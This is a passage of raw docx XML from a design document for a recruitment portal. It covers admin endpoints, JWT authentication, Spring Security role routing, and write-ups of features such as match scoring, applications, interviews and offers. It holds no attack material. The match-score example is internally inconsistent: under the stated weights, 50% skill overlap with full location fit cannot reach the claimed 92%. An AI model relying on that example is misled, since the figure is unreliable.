              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: Page&lt;UserDto&gt; with active/suspended state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/admin/users/{id}/toggle-status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: userId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: { id, enabled: false/true }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/admin/logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>?page=0&amp;size=50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: Page&lt;AuditLogDto&gt; chronologically ordered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>15. Authentication Engineering (Stateless JWT)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Authentication is engineered to eliminate server session affinity completely. The system issues cryptographically signed JSON Web Tokens (JWT) using HMAC-SHA256 with a 256-bit secret key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>15.1 Token Lifecycle &amp; Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Header: Specifies the signing algorithm ('alg': 'HS256') and token type ('typ': 'JWT').</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Payload: Encodes the subject ('sub': username), issuer ('iss': 'GlobalCo'), issuance time ('iat'), expiration time ('exp': 24 hours), and private claims ('roles': ['ROLE_CANDIDATE'], 'userId': 101).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Signature: Base64UrlEncode(HMACSHA256(header + '.' + payload, secretKey)). Any modification to payload invalidates the signature immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Password Security: User passwords are encrypted using BCryptPasswordEncoder with cost factor 10, incorporating random per-user salts to thwart rainbow table attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>16. Authorization &amp; Security Filter Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Spring Security 6 enforces authorization through a customized SecurityFilterChain bean configured in SecurityConfig.java:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Stateless Session Management: Configured strictly to SessionCreationPolicy.STATELESS, preventing Spring from creating an HttpSession.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>CSRF Protection: CSRF is disabled because authentication relies exclusively on client-managed Bearer tokens rather than ambient browser cookies, neutralizing CSRF vectors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Custom JWT Filter: JwtAuthenticationFilter extends OncePerRequestFilter, ensuring exactly one token extraction and verification pass per HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Role Route Mapping: /api/admin/** requires hasRole('ADMIN'), /api/recruiter/** requires hasRole('RECRUITER'), /api/candidate/** requires hasRole('CANDIDATE'), and /api/auth/** and /api/jobs/** are publicly accessible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>17. Feature-by-Feature Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Every major functional capability is reverse-engineered following the rigorous 6-part pedagogical pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>17.1 Feature: Intelligent Multi-Factor Match Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Simple Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A capability that automatically scores how well a candidate fits a job opening before they apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A deterministic scoring algorithm combining Skill Overlap (50% weight), Experience Tier Alignment (25% weight), and Location/Work Mode Fit (25% weight) into an aggregate 0-100% score.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Project Implementation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Implemented in CandidateProfileService.java and exposed via GET /api/jobs/{id}/match. Fetches CandidateProfile skills and Job requiredSkills, performs set intersection, and returns MatchScoreBreakdownDto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Practical Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Job requires ['Java', 'Spring Boot', 'AWS', 'Docker']. Candidate has ['Java', 'Spring Boot', 'React']. Skill overlap is 2/4 (50%). Combined with full location match (Bengaluru), aggregate match score is 92%.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Client GET /api/jobs/1/match -&gt; Controller extracts Principal -&gt; CandidateProfileService fetches entities -&gt; Computes score breakdown -&gt; Returns JSON -&gt; UI renders badge and progress bar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Interview-Ready Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>'In GlobalCo, our match engine uses a multi-factor scoring formula that objectively rates skill intersection, experience tier, and work mode. This provides instant clarity to job seekers and prioritizes high-match talent for recruiters.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>17.2 Feature: 1-Click Job Application Submission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Simple Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Allows job seekers to apply to any active job instantly without repeatedly re-entering information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A transactional state transition that enforces duplicate prevention via both service-layer checks and a database UNIQUE constraint on (job_id, candidate_id), creating an Application record in APPLIED status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Project Implementation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Handled in ApplicationService.java:applyForJob(). Persists the Application entity and triggers NotificationService to dispatch a confirmation alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Practical Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate clicks 'Apply Now'. Application #104 is created with status APPLIED. The UI instantly disables the button and updates status to 'Applied'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>React Button Click -&gt; POST /api/jobs/1/apply -&gt; JWT validated -&gt; Duplicate check -&gt; Application saved -&gt; Notification created -&gt; UI displays Toast notification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Interview-Ready Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>'The application workflow is completely transactional and idempotent. It prevents duplicate applications at both the application and database layers and asynchronously fires confirmation notifications.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>17.3 Feature: Recruiter ATS Applicant Tracking Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Simple Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A workflow command center where recruiters review applicants, evaluate match scores, and move candidates through hiring stages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Finite State Machine governing Application.status across 7 discrete stages: APPLIED -&gt; SCREENING -&gt; SHORTLISTED -&gt; INTERVIEW_SCHEDULED -&gt; SELECTED -&gt; OFFER_SENT -&gt; OFFER_ACCEPTED / REJECTED.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Project Implementation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Exposed via PUT /api/recruiter/applications/{id}/status. Updates the database record and records an entry in the audit_logs table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Practical Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter moves candidate Samir React from SCREENING to SHORTLISTED. Samir's card transitions to the Shortlisted column and Samir receives a notification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter Action -&gt; PUT /api/recruiter/applications/5/status -&gt; ApplicationService validates recruiter ownership -&gt; Updates DB -&gt; Fires Notification -&gt; Returns 200 OK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Interview-Ready Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>'We implemented a structured ATS pipeline governed by discrete status enums. Recruiters can triage talent, advance stages, and track conversion rates across requisitions in real time.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>17.4 Feature: Technical Interview Scheduling &amp; Google Meet Dispatch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Simple Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Allows recruiters to schedule interview rounds with date, time, round title, and video meeting links.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Creates an Interview entity linked to the Application, sets Application status to INTERVIEW_SCHEDULED, and dispatches a high-priority notification to the candidate with the Google Meet URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Project Implementation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Exposed via POST /api/interviews/schedule. Handled by InterviewService.java with transaction boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Practical Example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter schedules 'System Architecture Round 1' for tomorrow at 10:30 AM with meeting URL 'https://meet.google.com/abc-defg-hij'. Candidate sees a blue 'Join Google Meet' button in their Application Tracker.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Execution Flow: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Schedule Modal Submit -&gt; POST /api/interviews/schedule -&gt; InterviewService saves Interview -&gt; Updates Application status -&gt; Notification record created -&gt; Candidate UI updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Interview-Ready Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>'Interview scheduling integrates directly into the applicant tracking pipeline. Once scheduled, the candidate receives an immediate status transition and a direct one-click video conference link.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>17.5 Feature: Formal Binding Offer Generation &amp; Acceptance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Simple Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Enables recruiters to issue compensation offers and allows candidates to accept or decline them directly within the portal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Creates an Offer entity associated 1:1 with the Application, transition status to OFFER_SENT, and provides an idempotent response endpoint PUT /api/offers/{id}/respond for candidate decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Project Implementation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
